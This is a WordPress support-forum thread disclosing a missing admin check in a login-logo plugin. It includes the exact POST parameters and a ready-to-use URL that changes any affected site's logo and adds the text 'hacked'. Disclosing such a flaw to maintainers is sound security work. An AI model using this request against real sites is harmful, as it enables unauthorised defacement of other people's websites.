Security Issue
-
This plugin does not check an admin is logged in before updating the database with the logo you want to use.
This means you can make a POST request to any website that uses this plugin with the following parameters, and the logo will be changed:
wpclpl_save=1
wpclpl_logo_url=https://example.com/bad-logo.pngYou can test this with the following URL (change EXAMPLE.COM to your own domain):
https://getposted.io/post?action=https://EXAMPLE.COM&wpclpl_save=1&wpclpl_logo_url=https://i.giphy.com/JhqJUTyFPubQs.gif&wpclpl_additional_text=hacked
Viewing 3 replies - 1 through 3 (of 3 total)
Viewing 3 replies - 1 through 3 (of 3 total)
- The topic ‘Security Issue’ is closed to new replies.
